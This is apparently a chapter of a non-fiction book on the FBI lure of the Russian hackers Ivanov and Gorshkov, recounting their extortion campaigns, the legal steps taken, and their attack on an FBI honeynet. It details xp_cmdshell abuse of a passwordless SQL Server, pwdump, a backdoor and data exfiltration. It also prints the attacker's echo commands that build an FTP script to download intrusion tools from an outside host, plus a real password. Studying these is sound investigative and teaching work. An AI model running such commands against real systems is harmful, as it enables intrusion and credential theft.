Chapter 3. The Lure

Although it is almost axiomatic that Governmental units compete for scarce budget dollars and often fail to coordinate their activities, the offices of the FBI and the United States Attorneys in New Haven, Connecticut; Santa Ana, California; and Seattle, Washington, quickly perceived that the same Russian hackers had reached their cyber-tentacles into the systems of scores of financial entities and online businesses located throughout the United States and beyond. Although each of these offices was appropriately concerned with the victims located within its own jurisdiction, it was obvious that a nationally coordinated investigation was essential if the attacks were to be stopped.

Assistant U.S. Attorney Mark Califano, in New Haven, Connecticut, took the lead in getting people together. At a conference in the Southwest in early 2000, Mark arranged for an FBI Special Agent of the Santa Ana, California, office to give an after-hours briefing to Steve Schroeder and several agents from the Seattle office. The Santa Ana Special Agent exhibited a near-encyclopedic knowledge of the activities of the Russian hackers, and quickly became an accessible and responsive source of information. As a result of this meeting, Steve and the Seattle FBI agents learned that the scope of the intrusions from Russia was far beyond what had been reported by Seattle victims. In fact, Lightrealm, one of the Seattle area victims, had become a part of the problem.

Multi-District Cooperation Begins

Initial meetings between AUSAs and FBI agents are often a bit surreal. FBI agents are career law enforcement employees, whereas prosecutors often perceive their jobs as temporary training opportunities—way stations on the road to more lucrative jobs as defense attorneys. Consequently, a wary, exploratory interaction is not unusual, and such was the case during this first meeting. Steve, however, was a career prosecutor with more than 20 years' experience, and he was obviously viewed by the Seattle agents as part of the FBI family. The Santa Ana Special Agent quickly overcame his skepticism. By the end of the briefing, the participants had agreed to cooperate fully and had set up mechanisms for the exchange of information, including weekly conference calls.

As they began getting acquainted, Mark and Steve discovered that they had previously crossed paths professionally. Following his graduation from Duke Law School in 1988, Mark had worked as an Associate in the law firm of Bob Bennett. As such, he worked on a records production request that a Defense Department agency had made to a large corporation in the Pacific Northwest. Steve had represented the agency in Seattle and had attempted to narrow what he perceived as an overly broad demand. Both were amused to trade stories about the matter.

Online Information Bureau in Connecticut Is Hacked

New Haven’s interest in the case began when someone named Alexey broke into the computer systems of Online Information Bureau, Inc. (OIB, Inc.), a Connecticut-based merchant credit card processing company, and attempted to extort that company. OIB, Inc., is an Internet e-commerce business that processes merchant credit card information and hosts websites for other businesses. In its simplest form, customers transact credit card purchases over the websites of online merchants. Those online merchants then send their customers’ credit card charges each day to the processor. OIB and other credit card processing companies then sort those charges and send them to the banks that issued the customers’ cards. The processor then routes the payments it receives from the issuing banks back to the merchants’ accounts. Merchant credit card processors are thus an integral part of the financial system, handling thousands of transactions each day. Hence, intrusions into the seemingly secure servers of the merchant credit card processing companies can expose millions of credit card accounts to hackers and have the potential to result in substantial fraud losses throughout the system. Special Agents Ken Gray and Archie T. Stone of the FBI’s New Haven Division opened a case.

When Special Agents Gray and Stone began looking into the matter, they learned that, near the end of January 2000, OIB, Inc., started receiving a number of emails from an individual identifying himself as “Alexey.” In these emails, Alexey bragged that he had obtained root passwords for OIB’s systems, passwords that allowed him to control a significant portion of OIB’s computer systems. Alexey stated that if OIB, Inc., paid him, he would check the OIB, Inc., computer systems for security flaws and tell OIB how to protect its network. The text of the first email is reminiscent of Alexey’s communications with Max Chandler at Speakeasy. Interestingly, Alexey’s email address was . (Lightrealm was a Seattle-based ISP and web hosting company.) Alexey wrote:

“Hello My name is Alexey and im security engineer of Lightrealm Inc. I want check security on TotalMerchantServices /TotalPay Intranet/Internet and because im ask you about allow me to do this. If im not find any holes and bugs you pay to me US 0$, but if im find holes or bugs or im break in to boxes (and take admin permissions) you pay to me US 9999$. Anyways after security checking im give to you detailed report about what im check and what im did on your network. If you agree with this what kind of proofs you prefer? Please let me know as soon as possible what you think about this. Thanks and good luck to you—Alexey”

When OIB did not respond promptly, Alexey resent the same message to several persons at OIB, using email addresses that were only available within the internal OIB network. OIB, Inc., refused to pay and informed Alexey that it had already hired a computer security firm. When Alexey persisted in sending numerous messages, OIB asked him to stop his solicitations.[1]

The Investigation Expands

Alexey refused to desist, and continued to email OIB, Inc., seeking cash payments for protecting its computer system. To demonstrate that he had successfully cracked into OIB, Inc.’s computer system, he provided OIB, Inc., with secret passwords for its systems, passwords which Alexey could only have obtained by cracking the OIB, Inc., computer system. Alexey stated that unless he was hired and paid money by OIB, Inc., OIB risked having its system cracked, its customer information and funds stolen, and its computer system destroyed. On February 3, 2000 at 9:23 A.M. PST, Alexey wrote:

“Jeff, now imagine please Somebody hack you network (and not notify you about this), he download Atomic software with more then 300 merchants, transfer money, and after this did >rmrf /’ and after this you company be ruined.[2] I don’t want this and because this i notify you about possible hack in you network, if you want you can hire me and im always be check security in you network. What you think about this?”

An examination of the OIB, Inc., computer system revealed that it was cracked only a few days before Ivanov began communicating with OIB, Inc. On January 25, 2000, three of the OIB, Inc., computer servers had software installed that was foreign to these systems and that was not installed by OIB, Inc. The OIB audit also determined that the superuser logs of two of the systems, which log record activity on these systems by individuals with system administrator authority, had been turned off or deleted.[3]

Soon after Special Agents Ken Gray and Archie Stone went to work on the OIB, Inc., intrusion, they found that they had entered a complex labyrinth of interrelated crimes. For starters, Alexey had identified himself as a security engineer at Lightrealm and was using a Lightrealm.com email address, . The agents soon learned that Alexey’s characterization of himself as a “security engineer” at Lightrealm was not entirely fanciful.

Raymond Bero was an assistant administrator at Lightrealm, a Seattle-based company that was in the primary business of hosting websites for e-commerce businesses.[4] One Sunday in September of 1999, Mr. Bero was performing administration work on a Lightrealm computer called “getstats.com.” He became aware that an intruder had logged on to the system with root privileges from an IP address in Russia. Without letting the intruder know that he had been detected, Mr. Bero began to examine other machines on the network and learned that Lightrealm’s entire network appeared to have been compromised. Using a machine that he believed was secure, Mr. Bero began attempting to lock the intruder out, only to have all of the processes that he was running on the “secure” computer killed by the hacker. Realizing at that point that he did not know how to get the trespasser out of his network, Mr. Bero used the “talk” command to contact him and learn what he wanted.[5]

During the course of the ensuing communication, the hacker identified himself as Alexey Ivanov and told Bero that he wanted a job in America. As an inducement, Alexey offered to reveal to Bero how he had gotten into the Lightrealm system. Even though Alexey had broken into the Lightrealm network and had root powers, Bero testified that he “didn’t see anything that he’d done wrong.” Notwithstanding that Alexey had root access to the entire system, had killed admin-run processes, and could have done anything he wanted to, Bero testified that he had been unable to detect any activity on his part that rendered Alexey untrustworthy.[6]

In truth, Ray Bero and his colleagues at Lightrealm were helpless to control the 19-year-old Russian hacker, whose skill levels were above their own.[7] In a series of emails, the dates of which were not preserved, Alexey corresponded with Ray Bero and Mike Smith at Lightrealm. In those messages, Alexey identified numerous security holes in the system and offered to fix them.[8] He found five that were significant enough to warrant payments by Lightrealm. Mr. Bero arranged for Alexey to be paid by Lightrealm, and money was wired to an account in Ivanov’s name at Chelyabinvestbank, in Chelyabinsk, Russian Federation.[9]

Over the next few months, Alexey “hung out” in Lightrealm’s network, where he continued to find and report computer security vulnerabilities. Mr. Bero actually assigned a Unix-based computer to Alexey to “play around” with. The IP address of that computer, 216.122.89.110, was to become heavily involved in illegal activity. Mr. Bero also created an email address for Alexey, .[10]

During the course of his relationship with Ray Bero and Lightrealm, which extended over a period of months, Alexey Ivanov discussed his intentions of starting a computer security business. Ivanov planned to hack into companies, point out their security holes, and be rewarded for his efforts. Bero tried to explain to Alexey that some system administrators might not be as accepting of his efforts as he had been. Alexey then requested information on U.S. laws on computer intrusions.

Defeated by the Young Hacker, Lightrealm Attempts to Co-Opt Him

So accepting was Mr. Bero that he continued to express an interest in bringing Alexey to the United States and employing him as a network security employee. He also volunteered to help Alexey obtain employment with other high-tech companies. Alexey was interested and promptly sent his résumé. Lightrealm also went so far as to send Alexey a letter inviting him to come to the United States for a job interview. Such an invitation was a prerequisite for Alexey to obtain a Visa from the United States Consular Office in Russia.[11]

Despite his insistence that he had not seen Alexey do anything wrong, Mr. Bero, while under oath at the trial, identified scores of credit card transaction databases that belonged to Lightrealm’s business customers. Those databases had been recovered from computers in Russia that were used by Alexey Ivanov. He also acknowledged that sniffer logs recovered from the Russian computers established that Alexey had been intercepting log-ins, passwords, and credit card transactions on the Lightrealm system during his “trustworthy” relationship with Bero. Finally, in January Lightrealm had been contacted by an outraged system administrator from OIB, Inc., in Connecticut, who complained that Alexey had been attempting to extort money from that company while using a Lightrealm email address and representing himself to be a Lightrealm employee.[12]

During the Fall of 1999, while this activity had been going on, Micron Electronics, Inc., had been negotiating to acquire Lightrealm. When corporate legal counsel learned of the lurking presence of a Russian hacker on the system and that OIB, Inc., had been extorted, Mr. Bero was instructed to get him out of the network and to terminate the relationship. He responded by telephoning Alexey at the number listed on his résumé. Mr. Bero explained to Alexey that he could no longer permit him to have the run of the Lightrealm system. Alexey promised to remove his programs from the system, but persisted that he wanted to come to the United States and find work in computer security. In order to help him, Mr. Bero arranged for Alexey’s Lightrealm email account, , to be forwarded to , yet another hacked account. He also informed Alexey that the FBI was investigating his activities at OIB and that things were “too hot” for him to come to the United States at that time.[13]

Ray Bero’s attitude throughout his encounters with the FBI and the Department of Justice lawyers could charitably be described as defensive. After all, he had consistently been outmaneuvered by a 19-year-old, and his inability to secure the system that was his responsibility had exposed Lightrealm to significant potential liability. Therefore, such a frame of mind might be understandable. Nevertheless, while under oath at Gorshkov’s trial and when faced with incontrovertible facts, such as databases reflecting Alexey’s theft and use of credit cards from the Lightrealm system, Ray Bero reluctantly acknowledged that Alexey had committed crimes. Off the stand, however, he persevered in his denial that Alexey had intended to do anything wrong. Indeed, several years after his trial testimony, when Alexey was about to be sentenced in Connecticut, Ray Bero included the following passage in a letter that he wrote to the Judge on Alexey’s behalf:

“By the time I figured out that he was in the system, he already had complete access to every box we owned and some of the more valuable customer information such as credit card numbers. At any point he could have stolen or destroyed just about everything. But, even while Alexey had this upper hand, I never felt that we were seriously at risk. It seems that Alexey had no real intent on being malicious. He only had one request and that was to work for an American company and eventually come to America and live.”

The Lure Begins

Alexey was, indeed, interested in getting out of Russia and finding work in the United States. In addition to Speakeasy and Lightrealm, Alexey had sent his résumé to other Internet-based companies and had posted it on the Internet, where it was found by Special Agent Mike Schuler of the Seattle FBI. In other words, despite the warnings from Ray Bero that he was being investigated by the FBI, Alexey was exhibiting the optimism in his own invincibility that seems to be the hallmark of youth the world over. Perhaps that naive optimism could be harnessed to lure him to the United States, where he could be prosecuted for his extensive criminal activity.

Additional information obtained from OIB, Inc.’s systems revealed that on about March 29, 2000, Ivanov or an associate used the cracked system to attack and extort money from another merchant credit card processor in New Jersey, Financial Services, Inc. This brought Assistant United States Attorney Scott Christie into the case. Scott worked in Newark and, like Mark and Steve, was a CTC.[14]

Undercover lures are not without controversy, and some nations view efforts by another nation to entice their citizens to travel to its shores as a violation of sovereignty. This predisposition can be particularly strong where the two nations involved do not have an extradition treaty, which allows for the exchange of defendants by means of sanctioned procedures. Such is the case with the United States and Russia.

Nevertheless, undercover lures are relatively common in international law enforcement, and Department of Justice approval for such operations is routinely given. By now, four FBI offices and four United States Attorney’s offices were coordinating the investigation: New Haven, Connecticut; Seattle, Washington; Los Angeles, California; and Newark, New Jersey. Other offices throughout the nation also had an interest, but they were subordinating their investigations to the main effort.

“Invita” Is Born

The joint proposal was to create an undercover start-up computer security company in Seattle, Washington, under the supervision of the Seattle Office of the FBI. Office space would be leased, phones installed, and an Internet account opened, all in the name of a fictitious business called “Invita.” The Seattle FBI had also arranged for the expert assistance of a former Microsoft employee who was now involved in an Internet security firm. He would be available lest the communications with the Russian take a technical turn that the agents could not handle.

In order to qualify the lure for approval, Ivanov was charged in a sealed complaint filed in the District of Connecticut with: (1) interference with commerce by means of threats and extortion, in violation of 18 U.S.C. § 1951; (2) intentionally accessing a computer without authorization, in violation of 18 U.S.C. § 1030(a)(2); and (3) transmitting in interstate or foreign commerce communications containing a threat to cause damage to a protected computer with the intent to extort any money or other things of value, in violation of Title 18 U.S.C. § 1030(a)(7). All of these charges were related to Alexey Ivanov’s activities vis-à-vis Online Information Bureau, Inc., in Connecticut.[15]

Once the lure was formally approved, events began to move quickly. On Wednesday, June 21, 2000, Special Agents Marty Prewett, Milan Patel, and other colleagues of the Seattle FBI Office composed and sent an email to Alexey Ivanov at . Using the undercover name “Michael Patterson,” Special Agent Patel testified that he was asked to assist in the undercover operation because he had already established an undercover email account that could not be traced to the Government.[16] In his initial email to Ivanov, he wrote:

“Mr. Ivanov,

Invita is a new computer network security company located in the state of Washington, in the United States. We are a small start-up company, consisting mainly of former Microsoft and Sun employees. We are looking for an individual to be our Eastern European representative, focusing on computer security for western companies doing business in the former Soviet Union.

Your résumé was forwarded to us and we note that you have some of the skills for the job described below.

….

If you are interested and available for this position, or desire to be considered for other future positions at Invita, please forward a current résumé.

Sincerely,

Michael Patterson”[17]

On July 1, 2000, Alexey Ivanov responded:

“Hello Mr. Patterson

Im send my resume to you in my next email, and first of all i want talk with you about security consulting business and maybe future partner ship. Me and my business partner his name is Vasily Gorshkov start 2 month ago our own company this company is oriented on security consulting and web design. We have about 20 employees and we are located in Russia, Chelyabinsk. Our contacts phone numbers are: 7-3512-788753 (cell phone) 7-3512-364496 (my home phone). We can make partnership with you company. If you have any questions please call us or email to and [email protected].

Good luck and best regards”[18]

Alexey sent his résumé to “Michael Patterson” that same day.[19] He was obviously interested in working with a U.S. company, and seemed to be rising to the lure. The agents and prosecutors were also intrigued by Alexey’s reference to his “business partner,” Vasily Gorshkov. This was a new name. While the volume of the attacks on U.S. systems had been large enough to make it likely that more than one person was responsible, it was Alexey’s name and “handle” that were all over the victims’ logs. Now there was a new character in the plot.[20]

Although there was sufficient evidence to formally charge Ivanov with computer crimes, Gorshkov’s situation was more problematical. The undercover team did not have sufficient information with which to charge Gorshkov with criminal offenses, as it had first learned his name only during communications with Ivanov, who identified Gorshkov as his partner. Unless some valid means to arrest and hold Gorshkov could be derived, he would be free to return to Russia following the undercover meeting. Given the lack of cooperation that had been received from Russia to date, his return to Russia would effectively shield him from prosecution.

The Government’s occasional need to obtain testimony from foreign witnesses is addressed in several places in Title 18, the Federal Criminal Code. Collectively, the several statutes and rules provide for Material Witness Warrants. Section 3144 provides that, if it appears from an affidavit filed by a party that the testimony of a person is material in a criminal proceeding, and it is shown that it may become impracticable to secure that person’s presence by means of subpoena, the court may order the arrest of that person. That statute, by reference to Section 3142 (which pertains to the detention without bail of criminal defendants) also provides that a person arrested as a material witness may be detained for a reasonable time until his or her deposition can be taken.

In turn, Rule 15 of the Federal Rules of Criminal Procedure provides that, in the case of a detained witness, a Federal court may order that the deposition of that witness may be taken under oath. In order to preserve the Constitutional rights of a defendant against whom the deposition testimony might later be offered at trial, the Rule requires that the defendant be given the opportunity to attend the deposition with counsel. A defendant’s right to discovery of evidence in the Government’s files can also be accelerated by the Court, so that his or her counsel can meaningfully cross-examine the witness.[21]

Gorshkov seemed to meet all of the criteria of a Material Witness. Ivanov had been strongly linked to a series of illegal computer intrusions and extortion attempts. Gorshkov was identified as his partner. Consequently, Mark Califano obtained a Material Witness Warrant for Gorshkov from the United States District Court for the District of Connecticut. The warrant directed that he be arrested and transported to Connecticut for a deposition. The authorization for the undercover lure was expanded to include Gorshkov.

After consulting with Special Agent Marty Prewett, the Seattle FBI case agent, Milan Patel, still in the role of Michael Patterson, sent a message to Alexey on July 7, 2000, thanking him for his résumé. In that same message, he told Alexey that the idea of collaborating with a partner in Russia was “intriguing” and that he would be interested in discussing the idea further. He then raised the idea of Alexey’s traveling to the United States and asked him if he would be willing to come. Finally, Milan asked Alexey to suggest a time when he could telephone him to discuss the matter further.[22] When Alexey did not immediately respond, Special Agent Patel resent the message to both of the email addresses that he (Alexey) had provided in his initial response, and .

On July 9, 2000, Special Agents Patel and Prewett received three email messages from Alexey. In the first, Alexey provided a new telephone number, 7-3512-788449, which he said was a cellular phone that could be called at any time. While he had never been to the United States, Alexey explained, he had done some security projects for CTS, where he had worked with Jim Fitzgerald. Alexey invited Michael Patterson to contact Mr. Fitzgerald at , with whom he had worked. Alexey also provided URLs at tech.net.ru where Patterson could view web pages that Alexey’s company had designed. Alexey also indicated that, “if you want to see me in U.S.,” he would need sponsorship from Invita in order to obtain a Visa.[23]

On July 14, 2000, the undercover team prepared to make a telephone call to the first cell phone number provided. Special Agents Patel and Prewett were both members of the FBI’s Computer Crime Squad and had received considerable training in the field. In addition, Special Agent Patel had an Electrical Engineering degree and had worked on digital electronics in the Air Force. Nonetheless, to ensure that there was sufficient expertise available to credibly discuss network security, Special Agent Patel asked Brad Albrecht, a security manager for Microsoft Network (MSN) to actually make the call as “Michael Patterson.” Special Agent Mike Schuler was also present. Mike had been involved in the case from early on, would provide critical insights and analysis as the case progressed, and ultimately became co-case agent.[24]

Vasily Gorshkov Puts in an Appearance

Prior to actually placing the call, Marty Prewett, the case agent, obtained the requisite bureaucratic approvals to make a consensually monitored call. In plain English, this phrase invokes an exception under the Federal wiretap statute’s general prohibition against intercepting communications without a court order, if the interception is for law enforcement purposes and it is done with the prior consent of one party to the communication.[25] This issue brings with it some sensitivity only because some states, including the State of Washington, generally prohibit recording communications without the consent of all of the participants. If done as a part of a Federal law enforcement investigation, however, the recording of a conversation with the consent of only one party is exempt from state law by reason of the Supremacy Clause of the U.S. Constitution, which makes the laws of the United States the supreme law of the land.[26]

After some problems with connectivity, the call went through and a Russian male voice answered, “Hello.”[27]

“Alexey?” asked Brad Albrecht. “Alexey? Hi, my name’s, uh, Michael Patterson. I’m with Invita.”

“Hello,” the voice responded. A distinctive Brooklynese accent was soon discernible. In response to “Patterson’s” query whether it was a good time to talk, the voice replied, “I can talk.” Brad then attempted to turn the conversation to the requirements of a sponsor letter and U.S. Visa. The man on the other end seemed anxious to get to the nub of the matter.

“You know, we need only to be in America,” he said. “We have right now here a small firm, uh, uh, which works, works on software business….”

“So if you’re interested, uh, we can go to America, live there and work for you and all our firm will, uh, will work for you.”

“Cool, yeah…,” Brad (coached by the agents) encouraged him.

The Russian male continued to tout his company. “[We have] about 20 employees right now here. We have several projects, uh, already worked. So…” He then began to describe several website design projects that they had done. When Brad Albrecht told him that Invita was interested in the networking projects that they had done, the response was prompt.

“We don’t, uh, do, we can help you, with this, we have several, uh, very, uh, good specialists with, uh, with security.” “You can, uh, hacker,” he clarified. “[R]ight, right now there is about 20, uh, 12 programmers and three really hackers, so you know, that work…. Uh, they are specializing on security problems.”

“Right,” Brad encouraged.

“So they can fix it and they can broke it.”

Brad made it clear that it was those “security” aspects of what the Russian company did that were of interest to Invita. The call was then dropped.

Upon reconnecting, the conversation returned to the security question. The Russian male suggested that his company be given a chance to demonstrate the skills of its employees. “Maybe you can provide the, us with information about some site. We can see it and we can say it is secure or maybe it is totally unsecure. We can broke it or we can help to fix it.” This was a suggestion that he repeated several times.

In response to several questions regarding the type of problems that Invita needed help with, the agents coached Brad Albrecht to explain that Invita was trying to build a customer base and that it was not seeking help with specific security issues. In order to head off a defense that the Russian hackers thought they were coming to the United States to engage in legitimate security consulting, Steve Schroeder had instructed the agents to make it very clear in the communications with the hackers that an illegal model was intended—that the partnership would break into systems without prior authorization and then attempt to obtain payment for revealing and closing security holes. This was, in fact, the very model that had been followed by Alexey with OIB and Speakeasy.

Brad Albrecht gave it a shot, but was obviously uncomfortable in his role as a hacker entrepreneur. “[A]s a company,” he explained, “we can go in and say, hey, we see that you guys have a hole here and we’ll help you to fix that hole so that you no longer have these security problems. We’ll help you to set up your network correctly so you won’t have problems in the future or, ya know, we’ll be here to[28] you can keep callin’ us back and, and, uh, ya know, hopefully, we’ll get a good business….” Thus, the illegal nature of the proposal was not made crystal clear, but it turned out to be sufficient.

Shortly after this telephone conversation, Alexey sent an email message to Michael Patterson, in which he repeated the proposal, made during the call, that Invita set up a test network for them to hack.[29]

On July 27, 2000, the undercover team composed another email from “Michael Patterson” to Alexey. In that communication, the agents reported that Invita was busy accumulating clients that were interested in security services and that “the owners” of Invita were interested in meeting with Alexey in the United States. As to Alexey’s proposal to do a test hack to demonstrate his abilities, the undercover team related that the owners liked the idea and suggested that it could set up for their meeting in Seattle. The prospect of the Russian hackers blithely demonstrating their hacking skills while their every move was monitored by video, aural, and electronic surveillance was delicious. The undercover team also asked what had to be done in order for Alexey to obtain a Visa to travel to Seattle.[30]

The questions about Visas were calculated to convince Alexey that he was dealing with a start-up company comprised of persons who were relatively unsophisticated about international travel. In fact, the FBI was already working on the Visa issue through its Legal Attaché in Russia. If the Russian hackers agreed to travel to the United States (under circumstances carefully controlled by the FBI), the requisite Visas would be issued by the Consular Office nearest their home.

A Honeynet Is Created to Test the Hackers’ Skills

When Alexey persisted that he wished to demonstrate his skills prior to traveling to Seattle, however, the undercover team rethought the idea. If a network could be set up for the Russians to hack, the tools and techniques that they used, and the vulnerabilities that they exploited, could be precisely identified. In addition, the logs from the monitored target system would reveal the IP addresses from which the hackers were coming in. Consequently, the FBI contracted with Sytex, Inc., a Department of Defense contractor.

Sytex set up a research network consisting of eight computers and a Flowpoint 2200 router. The machines ran a number of operating systems and commercial database programs and were configured with an increasing level of security sophistication. When setting up the network, Curtis Rose, the Sytex Director of Investigations and Forensics, installed tcpdump, the packet capture utility (packet sniffer) developed at Lawrence Berkeley National Laboratory, so that every packet to and from the test network would be recorded.[31]

On October 20, 2000, the FBI undercover team sent the following message to Alexey from the Michael Patterson account:

“As you requested, we have been setting up a test for you to show your skills. We are in the process of setting up our network and can use that as a temporary platform. It is located at IP block 12.46.224.162-12.46.224.190. You have our permission to attempt to gain access to our public and private network. We set up the network to contain some vulnerabilities. We plan to watch your progress in order to evaluate your skills. Create a file in each box you access in order to prove your entry. When you finish, make recommendations in order to secure the system and email them to me.

Good luck,

Michael”[32]

Using a PowerPoint presentation that he had prepared,[33] Curtis Rose testified that the initial probe occurred on October 22, 2000, and came from an IP address registered to Cyber Express Communications, Ltd., in Kowloon, Hong Kong. This was almost certainly a compromised machine being used as a relay. Eleven seconds later, a connection attempt was made from Chelyabinsk, Russia. NetBIOS/Server Message Block (SMB) scans were performed and a list of user accounts was pulled from the target; on an unhardened Windows NT 4.0 system this enumeration can be done anonymously, over what is called a null session. The list included one jpace and one mpatterson, the undercover names used in the lure.[34]

The intruder then attempted to log in to the computer named enterprise, trying each username as its own password. It is a common security problem that lazy users simply repeat their usernames as their passwords. He then pinged three additional computers on the Sytex network and ran a port scan to learn which ports were open on them. On enterprise, the hacker found that port 1433, the port on which Microsoft SQL Server listens, was open.

Enterprise, a Windows NT 4.0 machine running SQL Server, was compromised within 13 minutes of the IP addresses being furnished to Alexey. The hole was a well-known one, and Alexey’s own report of October 27 (quoted below) spells it out: the SQL Server administrative account, sa, had no password, so anyone who could reach port 1433 could log in as sa. From there, SQL Server’s xp_cmdshell extended stored procedure runs arbitrary operating-system commands in the security context of the SQL Server service, which on this machine gave Alexey administrator privileges.[35]

Once he had compromised enterprise, the intruder effectively had a command prompt: each command he passed to xp_cmdshell from the SQL Query Analyzer window was executed by the operating system and its output returned to him. He then ran a series of commands designed to tell him about the system he had reached. Netstat showed him the machine’s network connections and listening ports, and the “dir /s” command gave him a recursive listing of directories and subdirectories on the system.[36]
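The sequence Curtis Rose reconstructed from the tcpdump capture (SMB enumeration, a ping and port sweep, then a connection to port 1433 within minutes) is exactly the kind of pattern a defender can pick out of packet logs. The following Python script is an added example, not code from the book or from Sytex: it runs a small detector over a constructed tcpdump-style capture (the attacker addresses are RFC 5737 documentation addresses, an assumption and not the ones from the Sytex capture; the target addresses are the honeynet block from the lure email) and flags any source that enumerates NetBIOS/SMB, sweeps ports, and then reaches for SQL Server.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in tcpdump's one-line TCP SYN format.  Attacker addresses
# are RFC 5737 documentation addresses (an assumption, not the ones from the
# Sytex capture); the target addresses are the honeynet block from the lure.
SAMPLE_CAPTURE = """\
13:02:11.104021 203.0.113.7.1102 > 12.46.224.162.139: S 71823:71823(0) win 8192
13:02:22.417800 198.51.100.9.1031 > 12.46.224.162.139: S 90011:90011(0) win 8192
13:02:23.001932 198.51.100.9.1032 > 12.46.224.162.445: S 90012:90012(0) win 8192
13:03:40.220010 198.51.100.9.1040 > 12.46.224.163.21: S 90101:90101(0) win 8192
13:03:40.231115 198.51.100.9.1041 > 12.46.224.163.23: S 90102:90102(0) win 8192
13:03:40.242201 198.51.100.9.1042 > 12.46.224.163.80: S 90103:90103(0) win 8192
13:03:40.253300 198.51.100.9.1043 > 12.46.224.163.1433: S 90104:90104(0) win 8192
13:03:41.100000 198.51.100.9.1044 > 12.46.224.162.1433: S 90105:90105(0) win 8192
13:11:09.551200 198.51.100.9.1050 > 12.46.224.162.1433: S 90201:90201(0) win 8192
13:30:02.000000 192.0.2.44.2000 > 12.46.224.162.80: S 55555:55555(0) win 8192
"""

# Matches the start of a tcpdump line for a TCP SYN: timestamp, src.port > dst.port: S
SYN_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): S "
)

ENUM_PORTS = {139, 445}   # NetBIOS session service and SMB over TCP
MSSQL_PORT = 1433         # default SQL Server listener


def parse_syns(capture_text):
    """Yield (time, src, dst, dport) for every TCP SYN line; other lines are skipped."""
    for line in capture_text.splitlines():
        m = SYN_RE.match(line)
        if m:
            yield (datetime.strptime(m["ts"], "%H:%M:%S.%f"),
                   m["src"], m["dst"], int(m["dport"]))


def detect_recon_to_mssql(capture_text, window=timedelta(minutes=15), sweep_threshold=4):
    """Flag sources showing at least two of: SMB enumeration, a port sweep,
    and a SQL Server connection shortly after the enumeration.
    Returns {src: sorted list of indicator names}."""
    by_src = defaultdict(list)
    for t, src, dst, dport in parse_syns(capture_text):
        by_src[src].append((t, dst, dport))

    findings = {}
    for src, events in by_src.items():
        events.sort()
        reasons = set()
        first_enum = next((t for t, _, p in events if p in ENUM_PORTS), None)
        if first_enum is not None:
            reasons.add("netbios_enum")
            if any(p == MSSQL_PORT and first_enum <= t <= first_enum + window
                   for t, _, p in events):
                reasons.add("mssql_after_enum")
        # distinct (host, port) pairs touched: a crude but effective sweep indicator
        if len({(dst, p) for _, dst, p in events}) >= sweep_threshold:
            reasons.add("port_sweep")
        if len(reasons) >= 2:
            findings[src] = sorted(reasons)
    return findings


if __name__ == "__main__":
    for src, reasons in detect_recon_to_mssql(SAMPLE_CAPTURE).items():
        print(f"{src}: {', '.join(reasons)}")
```

The single Hong Kong probe is not flagged because one indicator on its own is noise; the Chelyabinsk-style source is, because enumeration, sweep and the SQL Server connection all come from it within the window. The thresholds are deliberately parameters: on a busy network they need tuning, and the same logic ports directly to flow or Zeek connection logs.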

Attacks were launched from several IP addresses, including 195.128.157.67, registered to tech.net.ru, and 209.68.192.180, associated with king.cts.com, a computer belonging to CTS Network Services in San Diego, California. The intruder also connected once from an IP address registered to Hanaro Telecom, South Korea.[37]

The intruder also launched an RDS attack on one of the Sytex computers.[38] Microsoft Internet Information Server (IIS) is Microsoft’s web server software for Windows NT. It supports the SSL security protocol and turns an NT-based PC into a web site. RDS (Remote Data Services) is a component that lets a user on another computer, using an ActiveX-enabled web browser, query and update databases through the IIS server; in other words, RDS exposes remote database objects through IIS. RDS includes a component called the DataFactory object, and in the versions current in 1999 the DataFactory had a vulnerability that allowed a remote user to obtain unauthorized access to unpublished files on the IIS server and to use MDAC[39] to tunnel ODBC requests through the server to another database, internal or external. Microsoft had published a fix and an advisory for this hole (Security Bulletin MS99-025) in July 1999, more than a year before the Sytex test.

If the Microsoft JET OLE DB Provider or the Microsoft DataShape Provider was installed, an attacker could also use the JET engine’s VBA shell() function to run commands on the server with System privileges. Combined, these two flaws let a remote attacker run arbitrary commands with System-level privileges on the target host, with nothing more than a web browser or a short script.

The intruder also caused a number of commands to be entered through xp_cmdshell. Based on the speed of the entries, Curtis Rose concluded that the commands were being issued by a script rather than typed. By means of this script (which turned out to be a Perl script), the intruder used a series of echo commands to write a text file called c:\winnt\ftp_comm on enterprise. The file held the commands for an FTP session: it was designed to connect to an account named ctsavi on king.cts.com in San Diego, California, and download intrusion tools.[40]

Interestingly, the script connected to king.cts.com, opened user account ctsavi, and entered the password for that account, FynjyKj[. The script then entered a command to change to a directory called “bd” (for backdoor), and then executed a series of “get” commands to download a number of hacker tools or programs, including the following:

  • serv.exe

  • pwdump.exe

  • lomscan.exe

  • 26405.exe (This was a telnet program modified to run on port 26405 rather than the normal telnet port of 23.) The intruder renamed this file ntalert.exe.

Running pwdump on enterprise dumped the usernames and hashed passwords of every account on the system (Windows does not store passwords themselves; it stores one-way LM and NT hashes of them, which is what pwdump extracts). The intruder then opened a telnet session from tech.net.ru to port 26405 on enterprise, his new backdoor. After snooping around a bit, he found a file called sys.mdb; the .mdb extension generally denotes a Microsoft Access database, the sort of place one might expect to find customer data and credit card numbers. He then opened an FTP session to tech.net.ru, logged in as user subbsta with the password FynjyKj[ (the same password the script had used for the ctsavi account on king.cts.com), and transferred sys.mdb to his computer in Russia. Next, he checked his current directory, /home/subbsta. Changing to directory /home/subbsta/disk1/hack/nt, he then downloaded several files associated with a sniffer program.[41]
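Reconstructing what a dropper script did from the commands it sent is routine incident-response work, and the xp_cmdshell stream Rose analyzed is a good illustration. The following Python is an added example, not the book’s or Sytex’s code: it takes a constructed log of commands of the kind the Perl script issued (the host, account, password, directory and tool names are those the book gives; the exact ftp command-file syntax, the use of `ftp -n -s:` and the `bin` and `quit` lines are assumptions about how such a script is usually written), replays the echo redirections to rebuild the file they created, and summarizes the FTP session and any renames that followed.

```python
import re
from collections import defaultdict

# Constructed log of commands as they might have arrived through xp_cmdshell.
# Host, account, password, directory and tool names are from the book's
# account of the capture; the ftp command-file syntax is an assumption.
SAMPLE_COMMANDS = [
    r"echo open king.cts.com > c:\winnt\ftp_comm",
    r"echo user ctsavi FynjyKj[ >> c:\winnt\ftp_comm",
    r"echo cd bd >> c:\winnt\ftp_comm",
    r"echo bin >> c:\winnt\ftp_comm",
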